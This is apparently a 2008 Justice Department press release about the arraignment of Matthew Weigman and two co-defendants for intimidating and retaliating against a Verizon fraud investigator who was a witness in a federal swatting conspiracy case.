Matthew Douglas Weigman, 18, of Revere, Massachusetts, appeared before U.S. Magistrate Judge Irma C. Ramirez in Dallas yesterday for an initial appearance and arraignment. He had earlier appeared in U.S. District Court in Massachusetts for his detention hearing shortly after his arrest near Boston last month. According to the affidavit filed with the criminal complaint in the case, Matthew Weigman is blind.

Co-defendant Carlton Nalley, who lives in Alexandria, Virginia, was charged in the indictment with one count of obstruction of justice. Yesterday, he also appeared before Judge Ramirez in Dallas, who released him on standard conditions, plus additional conditions which include prohibiting any contact with any actual or potential victims, witnesses, or informants in the case. Co-defendant Sean Paul Benton, 22, of Malden, Massachusetts, was arrested last month and is charged with the same offenses as Weigman. Benton has also appeared before a magistrate judge in U.S. District Court in Boston and had been detained until today, when he was released from custody and ordered to surrender to the U.S. Marshals Service in Dallas on Tuesday, July 8, 2008, for a court appearance in the Northern District of Texas later that day. A trial date has not yet been set for any of the defendants.

The indictment alleges that from the beginning of April 2008 until May 28, 2008, Weigman, Benton, and others, used intimidation, threats, and corrupt persuasion, and knowingly engaged in misleading conduct toward a witness, a Verizon fraud investigator, in an ongoing federal investigation into his, Nalley’s and others’ conduct in relation to the ongoing conspiracy alleged in the swatting conspiracy case, U.S. v. Stuart Rosoff, et al, 3:07 CR-196-B.

For instance, Weigman and Benton, with the unauthorized use of access devices, modified the witness’s personal telecommunications instruments, verbally harassed him, and physically appeared at his residence without permission or invitation, with the intent to hinder, delay, and prevent him from speaking to a federal law enforcement officer about their involvement, or others’ involvement, in the commission of possible federal offenses. According to the criminal complaint, the “visit” occurred on a Sunday and Weigman lives approximately 66 miles from the witness.

The indictment alleges that Carlton Nalley intended to retaliate against the witness for providing a federal law enforcement officer truthful information regarding the commission of federal offenses by Nalley by attempting to interfere with his lawful employment or livelihood by making phone calls to the witness’s supervisor and providing false and misleading information in an attempt to have the witness fired.

According to the affidavit filed with the criminal complaint in the case, in December 2006, FBI agents executed a search warrant at Weigman’s home and, because he was a minor, interviewed him in his mother’s presence. He agreed to cooperate with the FBI; however, instead, he continued his criminal activities, including attempting to gain access to the Dallas U.S. Attorney’s Office voice mail system. Weigman continued his criminal activity despite the warnings, and the FBI severed its relationship with Weigman in early 2007. At that time, the government notified him in writing that he was a target of a federal investigation.

U.S. Attorney Roper praised the investigative efforts of the FBI. The case is being prosecuted by Assistant U.S. Attorney Candy Heath. 
